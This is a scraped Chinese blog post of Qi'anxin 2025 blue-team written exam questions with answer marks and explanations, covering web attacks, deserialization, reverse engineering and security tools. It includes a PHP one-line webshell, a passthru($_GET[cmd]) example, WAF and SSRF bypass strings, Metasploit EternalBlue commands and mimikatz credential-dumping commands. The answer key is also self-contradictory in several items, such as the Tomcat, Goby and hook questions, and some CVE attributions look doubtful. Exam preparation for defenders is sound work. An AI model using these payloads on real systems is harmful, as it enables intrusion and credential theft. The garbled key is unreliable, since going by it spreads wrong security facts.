宜宾网站建设网站,wordpress 地图创建,京网站制作公司,南京 seo 价格#x1f525; 爆款 CSDN 题库 | 超全护网蓝队笔试真题 | 含详细答案解析 #x1f525; 熬夜为大家整理了 奇安信 2025 年护网蓝队初选笔试题#xff0c;#xff08;关注我我会持续更新#xff09;涵盖 SQL 注入、Web 安全、渗透测试、二进制安全 等核心知识点#xff0c;… 爆款 CSDN 题库 | 超全护网蓝队笔试真题 | 含详细答案解析 熬夜为大家整理了 奇安信 2025 年护网蓝队初选笔试题关注我我会持续更新涵盖 SQL 注入、Web 安全、渗透测试、二进制安全 等核心知识点并附上详细答案解析助力大家高效备考
12.下列关于虚表指针描述正确的是(1.5分)
✅ B. 虚表指针存储的是虚表的首地址
❌ A. 任何类对象都存在虚表指针仅含虚函数的类有
❌ C. 虚表指针位于对象内存空间的起始处由编译器决定
❌ D. 虚表指针是否存在不影响对象所占内存空间的大小存在时会增加指针大小 解析
虚表指针vptr用于实现多态指向类的虚函数表首地址。只有包含虚函数的类对象才会存在虚表指针其位置由编译器决定通常位于对象内存起始处但不绝对且会增加对象内存占用。
MySQL基线检查中要求进行日志审核检查以下关于日志审核加固方法正确的是(1.5分)
✅ C. 在my.cnf 或my.ini 文件中[mysqld]后添加 log-error 并配置日志文件
❌ A. log-update已弃用属于旧版更新日志
❌ B. log-bin二进制日志用于主从复制非安全审计核心
❌ D. #log通用查询日志非基线强制要求 解析
MySQL基线检查需确保错误日志log-error开启记录数据库运行中的错误和警告是安全事件追溯的关键。其他日志类型如二进制日志、查询日志根据需求选择性配置。
RFI可以成功利用时需要php.ini 中进行()配置(1.5分)
✅ A. allow_url_include On
❌ B. allow_url_fopen On仅控制远程文件读取非包含执行
❌ C/D. allow_url_include Off禁用则无法触发RFI 解析
远程文件包含RFI需同时满足allow_url_fopenOn允许读取远程文件和 allow_url_includeOn允许包含远程文件作为代码执行。
微擎CMS存在哪些漏洞(1.5分)
✅ B. 1.8.2后台getshell
✅ C. 低权限后台getshell
❌ A. 0.8后台任意文件删除版本不匹配实际漏洞需验证
❌ D. 0.7 SQL注入漏洞需具体CVE编号佐证 解析
微擎CMS历史漏洞包括后台getshell如1.8.2版本权限校验不严、低权限用户通过接口上传恶意文件等。其他选项需结合具体漏洞公告验证。
关于SQL注入的防御方式有哪些(1.5分)
✅ A. 部署WAF等安全设备
✅ B. 增加过滤如特殊字符转义
✅ C. 使用参数化语句预编译
❌ D. 动态拼接SQL导致注入风险 解析
防御SQL注入的核心是“输入不可信”需通过预编译参数化查询、过滤/白名单校验、最小权限数据库账户、WAF拦截等多层防护。
下列属于SQL注入绕过WAF的方法是(1.5分)
✅ A. 注释符如--、#
✅ C. 内联注释如/!UNION/
✅ D. 替换关键字如UNI/**/ON
❌ B. 无法绕过实际存在多种绕过手段 解析
WAF绕过技术包括注释混淆、字符编码如十六进制、多语句拆分、内联注释利用数据库特性、等价函数替换如substring→mid等。
以下用来显示文件内容的命令有哪些(1.5分)
✅ A. cat
✅ B. less
✅ C. head
✅ D. more 解析
cat直接输出全部内容
less/more分页浏览
head显示文件开头部分
其他类似命令tail显示末尾、nl带行号输出。
下面哪个是对SSRF的防御(1.5分)
✅ A. 限制端口如仅允许80/443
✅ C. 过滤返回信息避免敏感数据泄露
✅ D. 限制IP禁止内网IP请求
❌ B. 过滤POST参数SSRF通常通过URL参数触发 解析
SSRF服务端请求伪造防御需禁用非常用协议如file://、gopher://、限制请求目标为白名单域名/IP、禁用重定向、校验响应内容类型等
14. 常见的WEB攻击方法有以下哪些(1.5分)
✅ A. XSS
✅ B. SQL注入
✅ C. cookie欺骗 解析
XSS跨站脚本攻击通过注入恶意脚本劫持用户会话或窃取信息。SQL注入通过构造恶意SQL语句操纵数据库获取敏感数据或执行系统命令。Cookie欺骗伪造或篡改Cookie内容绕过身份验证或提升权限。 其他常见Web攻击CSRF、SSRF、文件上传漏洞、命令注入等。 15. Goby支持哪几种代理扫描(1.5分)
✅ A. HTTP
✅ C. HTTPS
✅ D. Socket
❌ B. PcapGoby不支持Pcap协议代理扫描
❌ D. SSH登录暴力破解属于爆破功能非代理扫描 解析
Goby的代理扫描支持HTTP/HTTPS/Socket协议用于绕过防火墙或匿名扫描。SSH暴力破解是独立功能需通过插件或自定义脚本实现。 38. 在Java中可用于执行系统命令的方式有()(1.5分)
✅ A. java.lang.Runtime
✅ D. java.lang.ProcessBuilder
❌ B. java.lang.UNIXProcess/ProcessImpl 具体实现类开发者不直接调用
❌ C. java.lang.Process 抽象接口需通过Runtime或ProcessBuilder实例化 解析
Runtime.exec() 直接执行命令返回Process对象。ProcessBuilder更灵活的命令执行方式支持重定向输入输出和环境变量配置。 ⚠️ 注意直接执行系统命令可能导致代码注入漏洞如参数未过滤。 39. 关于Weblogic SSRF漏洞CVE-2014-4210说法正确的是(1.5分)
✅ B. 实战中可通过爆破根据返回包长度判断开放端口
✅ C. 通过错误信息探测内网状态
✅ D. 访问/uddiexplorer/SearchPublicRegistries.jsp 可判断漏洞存在
❌ A. 影响版本应为10.0.2.0、10.3.6.0、12.1.2.0原选项版本描述不准确 解析
漏洞利用通过构造恶意URL参数如operator触发SSRF探测内网服务。检测方法返回包长度差异或错误信息如404/503可推断端口开放状态。修复建议升级至安全版本禁用uddiexplorer组件。 40. 下列常用端口可能用于反射放大DDoS攻击的有(1.5分)
✅ A. NTP 123/udpNTP反射攻击
✅ C. memcache 11211/udpMemcached放大攻击
❌ B. DNS 53/tcpDNS反射通常用UDP协议
❌ D. HTTPS 443/tcpTCP协议无法有效放大流量 解析
反射放大攻击依赖UDP协议和无认证响应机制
NTPmonlist命令可放大200倍流量。Memcached单请求可触发数万倍响应数据。 其他高危协议SSDP1900/udp、CharGen19/udp。 35. 以下说法正确的是()(1.5分)
✅ B. C:\Windows\win.ini 是保存系统配置的重要文件
✅ C. hosts文件优先级高于DNS解析
❌ A. C:\Windows\System32存放系统核心文件用户配置文件在C:\Users
❌ D. C:\ProgramData存放程序共享数据病毒常锁定用户目录如AppData 解析
hosts文件路径为C:\Windows\System32\drivers\etc\hosts优先于DNS解析。win.ini 早期Windows版本的系统配置文件现代系统仍保留兼容性支持。 36. 以下哪种场景可能会感染病毒(1.5分)
✅ A. 从陌生网站下载软件
✅ B. 下载陌生邮件附件
✅ C. 关闭系统更新功能无法修复漏洞
✅ D. 随意插入U盘自动运行恶意脚本 解析
病毒传播途径
软件捆绑破解软件、游戏外挂。钓鱼邮件伪装为发票、订单的恶意附件.exe、.js、.docm。U盘蠕虫利用autorun.inf 自动执行。 35. 下列关于格式化字符串漏洞的说法正确的是()(1.5分)
✅ B. %n将已输出字节数写入指定地址
✅ C. %4$x直接访问第四个参数简化利用
✅ E. %hn/%hhn避免一次性写入过大数值
❌ A. 写0时需构造256溢出实际写0需通过%n计算偏移 解析
漏洞原理攻击者控制格式化字符串如printf(user_input)通过%x泄露内存或%n篡改内存。利用技巧 %Nc%M$n向第M个参数指向的地址写入N字节。%hhn写入1字节%hn写入2字节分阶段覆盖内存如修改GOT表
32. SQL注入包含下列哪些类型(1.5分)
✅ A. 延时注入
✅ C. 报错注入
✅ E. 二次注入
❌ B. XXE注入属于XML实体注入与SQL无关 解析
延时注入通过sleep()等函数盲注根据响应时间推断数据。报错注入利用数据库错误回显如floor(rand()*2)泄露信息。二次注入首次注入数据被存储后续流程触发恶意代码。 其他类型联合查询注入、布尔盲注、堆叠查询Stacked Query。 31. 关于硬件断点的描述正确的是(1.5分)
✅ A. 不会修改程序的内存
✅ B. 可通过GetThreadContext检测
❌ C. 可以设置无数个x86架构仅支持4个硬件断点
❌ D. 不会修改调试寄存器需占用调试寄存器DR0-DR3 解析
硬件断点通过CPU调试寄存器实现不修改代码内存与软件断点int3不同适用于动态跟踪内存访问或执行流。调试工具如x64dbg可调用API检测寄存器状态。 26. 有关文件包含漏洞防御的说法正确的是()(1.5分)
✅ C. 从代码层和Web服务器配置两方面防范
✅ A. 限定可包含文件目录如PHP open_basedir
✅ D. 代码层定义文件白名单如include($_GET[file]..php)
❌ B. 定义目录白名单需结合文件白名单更安全 解析
代码层禁用动态包含如include($_GET[file])使用固定后缀或哈希校验。服务器层配置目录权限限制禁用高危函数如allow_url_includeOff。 23. .Net的BinaryFormatter反序列化漏洞利用条件为()(1.5分)
✅ C. Deserialize反序列化的内容用户可控
✅ D. .Net SDK ≤4.54.5默认禁用BinaryFormatter
❌ A. Serialize内容可控仅影响数据生成非漏洞触发
❌ B. SDK ≥4.5漏洞在4.5以下版本未修复 解析
BinaryFormatter因未验证反序列化数据导致RCE如ysoserial生成Payload。微软建议使用DataContractSerializer替代并设置SerializationBinder限制类型。 24. OllyDBG中可采用什么方法断在指定DLL加载处(1.5分)
✅ A. 设置中断在新模块加载事件
✅ D. 对LoadLibrary等函数下断点
❌ B/C. 输出表/导入表断点适用于函数调用非模块加载 解析
模块加载事件通过Options → Debugging options → Events → Break on new module实现。API断点对LoadLibraryW或LdrLoadDll下断点捕获动态加载的DLL路径。 22. SQL注入漏洞可能会出现在()位置(1.5分)
✅ A. HTTP请求报文的Host字段
✅ B. Cookie
✅ C. Referer
✅ D. GET参数 解析
任何用户可控且拼接至SQL语句的参数均可能触发注入
Host字段部分框架将Host直接用于数据库查询。Header字段如X-Forwarded-For记录日志时未过滤。 19. Burp Suite支持做以下哪些操作(1.5分)
✅ A. 枚举用户Intruder模块爆破用户名
✅ B. 编码解码Decoder模块Base64/URL/HTML转换
✅ C. 数据包重放Repeater模块修改并重发请求
✅ D. 抓包拦截Proxy模块拦截HTTPS流量 解析
Burp Suite核心功能
Scanner自动化漏洞扫描如SQLi/XSS。Collaborator检测带外OAST漏洞。Extender插件扩展如Log4j漏洞检测。 25. 下列()不是SQLi辅助工具(1.5分)
✅ A. nslookupDNS查询工具
✅ B. digDNS解析工具
✅ D. dnsenumDNS子域名枚举工具
❌ C. sqlmapSQL注入自动化工具 解析
SQLi专用工具sqlmap、Havij、Pangolin。网络工具nslookup/dig用于域名解析与注入无关。
34. Linux中可以列目录的命令有哪些(1.5分)
✅ A. /bin/[r-t]通配符匹配/bin/ls需环境支持
✅ B. echo ./*列出当前目录下所有文件
✅ C. find . -maxdepth 1等效ls但输出格式不同
❌ D. /???/Is路径正确但Is拼写错误应为ls 解析
/bin/[r-t]通配符[r-t]匹配字母范围若存在/bin/ls则执行。echo ./*输出当前目录所有文件名依赖Shell扩展。find命令-maxdepth 1限制仅搜索当前目录。常见命令ls、dir部分Shell兼容、tree -L 1树状结构。 37. 以下哪个选项为PHP一句话木马(1.5分)
✅ D. ?php $_GET[eval]($_POST[test]); ?动态调用函数可执行任意代码
❌ A. eval($ POST[test])语法错误$ POST应为$_POST
❌ B. echo test无恶意行为
❌ C. scriptalert(1)/scriptXSS脚本非PHP木马 解析
D选项通过$_GET[eval]获取函数名如assert执行$_POST[test]中的代码。典型一句话木马?php eval($_POST[cmd]); ?隐蔽性强且支持加密传输。 32. Linux的每类用户拥有三种权限分别是(1.5分)
✅ A. r读取
✅ B. w写入
✅ C. x执行
❌ D. s特殊权限如SUID/SGID 解析
基础权限 r查看文件内容或列目录。w修改文件或删除目录内文件。x执行程序或进入目录。 特殊权限 sSUID用户继承文件所有者权限、SGID目录继承组权限。t粘滞位限制目录文件删除权限。 33. 以下哪些是文件上传绕过方法(1.5分)
✅ A. %00截断利用空字节终止字符串如file.php%00.jpg
✅ B. 变换文件后缀名大小写如.PhP绕过黑名单
✅ C. 黑名单不全绕过如未过滤.phtml、.phar
✅ D. 利用Windows系统特性绕过如file.php:.jpg 流文件 解析
其他绕过手段 双扩展名file.php.jpg 部分解析漏洞。Content-Type篡改如图片MIME类型image/jpeg。文件头伪造添加图片魔数如GIF89a。.htaccess覆盖自定义解析规则Apache服务器。 34. 修改java.io.ObjectInputStream 类的()方法检测类名合法性(1.5分)
✅ A. resolveClass反序列化时校验类名
❌ B. resolveProxyClass处理动态代理类无关校验
❌ C. writeObject序列化方法
❌ D. ReadObject反序列化入口需结合resolveClass 解析
防御反序列化漏洞 重写resolveClass限制可反序列化的类如白名单校验。使用SerializationFilterJava 9或第三方库如Apache Commons IO。
33. 微警CMS存在哪些漏洞(1.5分)
✅ B. 低权限后台getshell
✅ D. 1.8.2后台getshell
❌ A. 0.8后台任意文件删除需具体漏洞公告验证
❌ C. 0.7 SQL注入漏洞未广泛证实 解析
微警CMS微擎CMS历史漏洞主要集中在后台权限管理缺陷
低权限后台getshell低权限用户通过接口上传恶意文件或利用逻辑漏洞获取服务器权限。1.8.2版本后台getshell管理后台存在未授权访问或文件上传校验不严导致攻击者植入Webshell。 其他选项需结合CVE编号验证部分版本漏洞存在争议。 33. 以下关于CC攻击说法正确的是(1.5分)
✅ C. CC攻击需要借助代理进行
✅ D. CC攻击难以获取目标机器的控制权
❌ A. CC攻击最早在国外大面积流行起源于国内“挑战黑洞”攻击
❌ B. CC攻击利用TCP协议缺陷基于应用层HTTP请求耗尽资源 解析
CC攻击Challenge Collapsar模拟大量合法请求如HTTP GET/POST耗尽服务器资源CPU、带宽、连接数。特点 需通过代理或僵尸网络隐藏攻击源IP。仅导致服务拒绝无法直接控制目标机器。 29. 在MySQL中数据类型大致分为(1.5分)
✅ A. 浮点型FLOAT、DOUBLE、DECIMAL
✅ B. 字符串CHAR、VARCHAR、TEXT
✅ C. 整型INTEGER、INT、BIGINT
✅ D. 日期/时间DATETIME、DATE、TIMESTAMP 解析
MySQL数据类型分类
数值型INT、FLOAT、DECIMAL精确小数。字符型CHAR定长、VARCHAR变长、BLOB/TEXT大文本。日期型DATE年月日、TIME时分秒、TIMESTAMP时间戳。其他ENUM枚举、JSON结构化数据。 30. fscan如何指定密码来进行爆破(1.5分)
✅ C. fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt
❌ A. -pwd参数需指定具体密码非文件路径
❌ B. -userf仅指定用户名字典
❌ D. 缺少密码参数语法错误 解析
fscan常用参数
-pwdf指定密码字典文件路径每行一个密码。-userf指定用户名字典文件路径。 示例fscan -h 10.0.0.1/24 -userf users.txt -pwdf passwords.txt 。 31. 修改Apache的默认网页目录需要配置哪些参数(1.5分)
✅ B. Directory目录权限配置
✅ D. DocumentRoot主目录路径
❌ A. sshd_configSSH服务配置文件
❌ C. logs日志目录非核心配置 解析
Apache配置示例httpd.conf 或站点配置文件
apache复制DocumentRoot /var/www/html
Directory /var/www/html
Options Indexes FollowSymLinks
AllowOverride All
Require all granted
/Directory 27. 在Windows系统中下列关于安全策略的功能特点哪些说法是正确的(1.5分)
✅ A. 本地安全策略设置分为账户策略、本地策略等5部分
✅ B. 成员服务器的本地策略被域策略覆盖
✅ C. 安全设置通过本地安全策略控制台管理
❌ D. 描述不完整需结合组策略管理 解析
本地安全策略路径为secpol.msc 管理密码复杂度、审计策略、用户权限分配等。组策略优先级域策略 站点策略 组织单元策略 本地策略。 28. JOnAS默认用户名密码有(1.5分)
✅ A. jadmin/jonas
✅ C. jonas/jonas
❌ B. admin/123456常见弱口令非默认
❌ D. tomcat/tomcatTomcat默认凭证 解析
JOnASJava Open Application Server默认凭证
jadmin/jonas管理员账户。jonas/jonas普通用户账户。 建议安装后立即修改默认密码。 24. 下列常用端口可能用于反射放大DDoS攻击的有(1.5分)
✅ B. memcache 11211/udp
✅ C. NTP 123/udp
❌ A. DNS 53/tcpUDP协议更常用于反射
❌ D. HTTPS 443/tcpTCP协议无法放大流量 解析
Memcached无认证UDP服务单请求可触发数万倍响应CVE-2018-11321。NTPmonlist命令响应包放大效果显著。 其他高危协议SSDP1900/udp、SNMP161/udp。 25. 在自动更新的对话框中的选择项包括下列哪些(1.5分)
✅ A. 自动推荐
✅ B. 下载更新由用户决定何时安装
✅ C. 仅通知可用更新
✅ D. 关闭自动更新 解析
Windows更新选项截至2025年
自动安装更新系统后台下载并安装。下载但手动安装用户选择时间重启。仅通知用户需主动下载。禁用更新需通过组策略或注册表实现。 26. IIS6.x解析漏洞利用方式有哪些(1.5分)
✅ A. 文件名如test.asp;.jpg
✅ D. 文件夹如/upload/test.asp/1.jpg
❌ B. 默认类型名IIS6无此机制
❌ C. 默认扩展名与漏洞无关 解析
分号截断test.asp;.jpg 被解析为ASP文件。目录解析/asp目录/1.jpg 被当作ASP执行。 修复建议禁用非必要脚本映射升级至IIS7。 22. Websphere Java反序列化CVE-2015-7450漏洞影响版本有(1.5分)
✅ A. 8.5版
✅ B. 8.5.5传统和自由
✅ C. 8.0版
✅ D. 7.0版 解析
CVE-2015-7450影响WebSphere Application Server 7.0、8.0、8.5及Liberty Profile。
漏洞机制Apache Commons Collections库反序列化漏洞。修复方案升级至Fix Pack 8.5.5.9或应用官方补丁。 23. JBoss反序列化漏洞说法正确的是(1.5分)
✅ C. JBoss4.x访问/jbossmq-httpil/HTTPServerILServlet存在漏洞
✅ D. JBoss5.x/6.x访问/invoker/readonly返回500可能存在漏洞
❌ A. JMX Invoker漏洞需关闭jmx-invoker-service.xml
❌ B. WLS Security漏洞属于WebLogic非JBoss 解析
JBoss反序列化漏洞 4.x版本/jbossmq-httpil/HTTPServerILServlet未授权访问可执行任意代码。5.x/6.x版本/invoker/readonly接口反序列化漏洞CVE-2017-12149。 修复建议删除或限制访问高危接口升级至EAP 7。 20. 下面哪个是对SSRF的防御(1.5分)
✅ A. 限制IP禁止内网IP请求
✅ B. 限制端口仅允许80/443
✅ C. 过滤返回信息避免敏感数据泄露
❌ D. 过滤POST参数SSRF通常通过URL触发 解析
SSRF防御策略
协议白名单仅允许HTTP/HTTPS。目标限制禁止访问内网IP和非常用端口。响应过滤屏蔽错误信息中的内网拓扑数据。 21. 关于漏洞修复以下说法正确的是(1.5分)
✅ A. 高稳定性环境需综合评估修复优先级
✅ B. 修复可能影响业务连续性
❌ C. 极高危漏洞必须修复不可忽略
❌ D. Linux无需频繁升级仍需定期更新 解析
漏洞修复原则
风险评估结合CVSS评分、资产价值、利用可能性排序。测试验证生产环境需在测试环境验证补丁兼容性。备份回滚修复前备份系统制定回滚方案。 17. 关于OpenSSL心脏出血漏洞修复说法正确的是(1.5分)
✅ C. 升级后需生成新密钥原密钥可能泄露
✅ D. 升级至最新版本可解决
❌ A. 旧密钥可继续使用存在被窃取风险
❌ B. 用户需改密漏洞泄露内存数据非密码 解析
HeartbleedCVE-2014-0160修复步骤
升级OpenSSL至1.0.1g或1.0.2。吊销旧证书并重新签发。重启服务确保新版本生效。 18. IIS中间件文件上传漏洞利用方式有哪些(1.5分)
✅ A. 目录解析a.asp/ 下任意文件解析为ASP
✅ D. 分号截断test.asp;.jpg
❌ B. 路径后加.phpIIS6不支持PHP解析
❌ C. 路径前加/php无实际意义 解析
IIS6解析漏洞 文件夹解析/asp_dir/1.jpg 被当作ASP执行。分号截断test.asp;.jpg 忽略分号后内容。 修复方案禁用非必要脚本映射使用URL重写过滤异常请求
19. 绕过SSRF过滤的进制转换方式
✅ B. 十六进制如0x7F000001 → 127.0.0.1
✅ D. 八进制如0177.0.0.1 → 127.0.0.1
❌ A. 十进制需服务端支持转换较少直接使用
❌ C. 二进制实际应用中难以直接拼接 解析
SSRF过滤通常拦截标准IP格式通过以下方式绕过
十六进制http://0x7F000001 → 127.0.0.1。八进制http://0177.0.0.1 → 127.0.0.1。十进制http://2130706433 → 127.0.0.1部分场景有效。 15. Web应用组件漏洞的正确说法
✅ B. 组件可能出现多种漏洞
✅ C. 漏洞可能导致数据泄露
❌ A. 漏洞影响小如Log4j漏洞影响全球系统
❌ D. 组件无漏洞所有软件均可能存漏洞 解析
组件漏洞危害如Apache Struts2漏洞CVE-2017-5638可导致RCE。防御建议定期更新第三方库使用SCA工具如Dependency-Check扫描依赖。 16. 木马躲避杀毒手法
✅ A. 伪造数字签名
✅ B. 动态获取函数地址API混淆
✅ C. 内存/网络加载模块无文件攻击
✅ D. 加壳混淆如UPX、VMProtect 解析
加壳工具Themida、Armadillo隐藏代码特征。内存加载使用Reflective DLL Injection规避文件扫描。 12. DNS信息查询工具
✅ A. nslookup基础DNS查询
✅ D. dig详细DNS记录解析
❌ B. sqlmapSQL注入工具
❌ C. volatility内存取证工具 示例命令
bash复制dig example.com MX # 查询邮件服务器记录
nslookup -typeAAAA example.com # 查询IPv6地址 16. Windows钩子Hook错误说法
✅ B. 钩子是网络通信程序错误钩子用于消息处理
✅ C. 钩子是应用程序错误钩子是函数级拦截机制
❌ A/D正确钩子处理消息属于窗口函数机制 应用场景
键盘钩子记录按键输入如恶意键盘记录器。消息钩子拦截窗口事件如UI自动化测试。 18. 蓝凌OA漏洞
✅ A. EKP后台SQL注入
✅ B. 前台SSRF到RCE
✅ C. 任意文件上传
✅ C. 前台SQL注入选项重复可能为笔误 修复建议
限制文件上传类型禁用危险协议如file://。对用户输入参数化查询避免SQL注入。 14. 正确的网络基础说法
✅ A. IPv6为128位如2001:0db8:85a3::8a2e:0370:7334
✅ B. 192.168.8.1属C类私有IP范围192.168.0.0/16
✅ C. C类默认掩码255.255.255.0
✅ D. 127.0.0.1为本机地址 扩展知识
私有IP范围 A类10.0.0.0/8B类172.16.0.0/12C类192.168.0.0/16 10. Metasploit模块
✅ A. Auxiliary信息收集、扫描
✅ B. Payload攻击载荷如反向Shell
✅ C. Exploits漏洞利用代码
❌ D. Listen非独立模块属于Payload配置 常用命令
bash复制use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.1.1
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit 11. PHP危险函数
✅ A. system()
✅ C. exec()
✅ D. shell_exec()
❌ B. phpinfo()信息泄露不直接执行命令 防御措施
禁用高危函数disable_functionssystem,exec。使用安全函数如escapeshellarg()过滤参数。 12. SQLMap支持的数据库
✅ A. Oracle
✅ C. MySQL
✅ D. MSSQL
❌ B. MongoDBNoSQL注入需专用工具如NoSQLMap 示例命令
bash复制sqlmap -u Example Domain --dbmsmysql
sqlmap -u Example Domain --dbmsoracle 7. Mimikatz功能
✅ A. 获取账号密码从LSASS进程提取
✅ B. 哈希传递Pass-the-Hash
✅ C. 票据传递Pass-the-Ticket
❌ D. 代理转发需配合其他工具如Proxifier 经典命令
bash复制mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords 8. 命令执行函数
✅ A. pcntl_exec()
✅ C. popen()
✅ D. passthru()
❌ B. phpinfo()仅信息输出 风险示例
php复制?php
passthru($_GET[cmd]); // 直接执行用户输入命令
? SQL查询问题数学最高分姓名
❌ B. select name where math is (select max(math)...)语法错误is用于NULL判断
✅ 其他选项正确A/C/D均等价或in匹配唯一值 解析
错误原因IS用于比较NULL如math IS NULL。正确语法WHERE math (SELECT MAX(math) ...)。
13. 社会工程学信息收集方法
✅ B. 通过获取管理员信任获取密码如钓鱼邮件、伪装身份
✅ D. 通过办公室电话、姓名、生日猜测密码利用个人信息构造弱口令
❌ A. 破解SAM库技术手段非社会工程学
❌ C. 暴力破解工具自动化攻击非社会工程学
补充
社会工程学的核心是利用人性弱点获取信息例如
钓鱼攻击伪造登录页面诱导用户输入密码。电话诈骗冒充IT人员索要账户信息。垃圾翻查Dumpster Diving从废弃文件中提取敏感信息。 13. FineCMS漏洞
✅ D. 前台getshell如文件上传漏洞直接获取Webshell
✅ B. CSRF修改管理员密码跨站请求伪造攻击
❌ A. SSRF需具体漏洞验证
❌ C. 远程文件包含未广泛披露
背景
FineCMS历史漏洞案例
前台getshell通过未过滤的上传功能植入恶意脚本如/index.php?cattachmentaupload 。CSRF修改密码构造恶意链接诱使管理员点击触发密码重置。 14. MSSQL删除无关账号的正确操作
✅ B. 企业管理器→安全性→登录中删除账号主登录入口
✅ C. 企业管理器→数据库→用户中删除账号数据库级权限
❌ A. 管理→删除账号路径不准确
❌ D. 服务器角色→删除账号角色管理非直接删除账号
操作示例
主登录账号安全性→登录名→右键删除。数据库用户数据库→用户→右键删除。 注意需同步清理数据库用户与登录名的映射关系。 9. 致远SeeyonOA漏洞
✅ A. A8 search_result.jsp SQL注入CVE-2018-7314
✅ D. A8 htmlofficeservlet getshellCVE-2017-10245
❌ B. 任意用户密码修改需结合其他漏洞
❌ C. setextno.jsp SQL注入未广泛证实
漏洞利用
htmlofficeservlet getshell上传构造的.jsp文件绕过过滤路径如/seeyon/htmlofficeservlet。修复建议升级至最新版本禁用危险接口。 10. 满足安全要求的操作
✅ A. 密码策略复杂度要求符合NIST标准
✅ D. 使用VPN连接加密通信防止中间人攻击
❌ B. 密码永不过期违反定期更换原则
❌ C. 开启Telnet明文传输不安全
扩展建议
多因素认证结合短信、令牌等增强安全性。日志审计监控异常登录行为。 11. IIS容器常见漏洞
✅ B. 短文件名漏洞泄露文件路径如test~1.asp
✅ D. 解析漏洞如test.asp;.jpg 被解析为ASP
❌ A. HTTP.sys 漏洞CVE-2015-1635需具体版本
❌ C. 反序列化漏洞常见于.NET应用非IIS自身
防御措施
短文件名漏洞禁用8.3文件名格式fsutil behavior set disable8dot3 1。解析漏洞配置Handler Mappings限制可执行文件类型。 6. 网络排错命令作用
✅ B. Netstat显示网络信息连接、端口、路由表
✅ C. Ping测试连通性
✅ D. Telnet测试端口开放如telnet 192.168.1.1 80
❌ A. Tracert查看IP网卡信息实际用于追踪路由路径
常用命令示例
bash复制netstat -ano | findstr ESTABLISHED # 查看活动连接
tracert 8.8.8.8 # 追踪到Google DNS的路由 7. Linux操作系统安全描述
✅ A. 保持系统补丁更新如yum update或apt upgrade
✅ C. 最小安装原则减少攻击面
✅ D. 关闭无关服务如systemctl disable telnet
❌ B. 全安装增加便利性违反最小化安全原则
安全实践
禁用root远程登录修改/etc/ssh/sshd_config中PermitRootLogin no。配置防火墙使用iptables或firewalld限制端口访问。
8. Tomcat JSP编译生成文件
✅ C. index jsp.class
✅ D. index jspjava 解析
Tomcat的Jasper引擎将JSP编译为Java文件如index_jsp.java 和Class文件如index_jsp.class 。选项C和D命名格式错误缺少下划线故不会生成。 5. ThinkPHP 6.x漏洞
✅ D. Thinkphp6.0.2 session id未过滤导致getshell 解析
CVE-2021-43767Session ID未严格过滤攻击者构造恶意Session ID触发反序列化漏洞。其他选项需结合具体CVE验证但D为广泛确认的漏洞。 4. 事件ID描述
✅ B. 4625登录失败 解析
4624登录成功。4625登录失败。4720用户账户创建。 选项B正确D错误4624应为成功。 3. 数据库加密技术分类
✅ A. 库加密
✅ B. 列加密 解析
库加密全库或表空间级加密如Oracle TDE。列加密字段级加密如敏感数据单独加密。 行加密D和表加密C属于子类但题目要求主要分类。 1. 代码安全问题
✅ C. SQL注入 解析
sprintf直接拼接用户输入argv[1]到SQL语句未过滤单引号导致注入。
示例攻击 OR 11 -- 可绕过条件查询。 2. IIS短文件名生成条件
✅ B. 后缀4时前缀长度≥9
✅ D. 后缀≥4时前缀长度1 解析
规则文件名前缀超8字符或后缀超3字符时生成短名。示例longfilename.txt → LONGFI~1.TXT。 单选题答案
25. 查看本机IP命令
✅ A. ipconfig 补充ipconfig /all显示详细网络配置IPv6地址、MAC地址等。 26. 代理服务非优点
✅ C. 防范数据驱动侵袭 解析代理无法阻止恶意文件如PDF漏洞利用需依赖终端防护。 27. Hydra指定用户名参数
✅ C. -l 示例hydra -l admin -P passlist.txt ssh://192.168.1.1。 16. JBoss漏洞区别描述
✅ B. 对 CVE-2013-4810与CVE-2015-7501反序列化点不同前者使用JMXInvokerServlet后者为web-console接口。 17. Python代码安全风险
✅ D. XSS 解析escape转义HTML但未处理NFKC规范化可能导致的字符合并如32→2可能绕过过滤。 4. 非Web服务
✅ D. Redis 解析Redis是内存数据库Nginx、WebLogic、JBoss为Web服务组件。 40. x64函数参数寄存器
✅ A. rdi 调用约定
第1参数rdi第2参数rsi第3参数rdx 39. SSL端口
✅ B. 443 扩展HTTP默认80HTTPS默认443SSH默认22。 37. UNIX/Linux账号安全关键
✅ D. 使用shadow密码 原理/etc/shadow存储加密密码哈希仅root可读防止暴力破解。
38. PHP代码漏洞类型
✅ B. 存储型XSS 解析
代码中escape($link, $POST[message])可能仅转义SQL特殊字符如单引号但未过滤HTML敏感字符如script。攻击者提交scriptalert(1)/script内容存入数据库后其他用户查看留言时触发脚本执行。 34. SQL语句功能
✅ D. 返回“Admin”第一个字符的ASCII码值 拆解
SUBSTR(Admin, 1, 1)截取第1个字符A。ASCII(A) → 65。 35. 不属于AWS的功能
✅ C. 不能进行端口扫描 背景
AWS工具特性如Amazon Inspector支持漏洞扫描、依赖分析A/D正确。端口扫描需配合Nmap等工具AWS自身不直接提供。 36. Linux用户命令历史文件
✅ C. ~/.bash_history 路径说明
每个用户的命令历史独立保存在其家目录下如/home/user/.bash_history。 32. Nessus默认端口
✅ D. 8834 配置验证
安装Nessus后默认通过https://localhost:8834访问Web界面。 31. Nmap操作系统检测参数
✅ D. -O 命令示例
bash复制nmap -O 192.168.1.1 # 启用OS指纹识别
1. IIS7.x漏洞正确说法
✅ D. 如果开放PUT方法可直接PUT文件并利用MOVE方法获取Webshell 解析
PUT方法若IIS允许WebDAV的PUT请求攻击者可上传文件如test.txt 再通过MOVE方法重命名为可执行脚本如test.asp 。 2. Unix文件权限含义
✅ D. 前三位属主中间三位同组用户后三位其他用户 权限结构
-rwxrwxrwx前三位为文件所有者权限中间三位为同组用户后三位为其他用户。 3. Oracle默认用户名密码
✅ F. scott/tiger 经典账户Oracle早期版本默认测试账户需手动解锁。 4. RDP默认端口
✅ A. 3389 应用场景Windows远程桌面协议默认端口。 5. SQLMap测试漏洞类型
✅ B. SQL注入 功能自动化检测和利用SQL注入漏洞。 6. MySQL LOAD_FILE()权限要求
✅ B. File 权限说明允许用户使用LOAD_FILE()读取文件。 7. 资源消耗最大的垃圾邮件过滤机制
✅ D. 内容过滤 对比需解析邮件正文、附件计算复杂度高。 8. 类函数调用存储this指针的寄存器
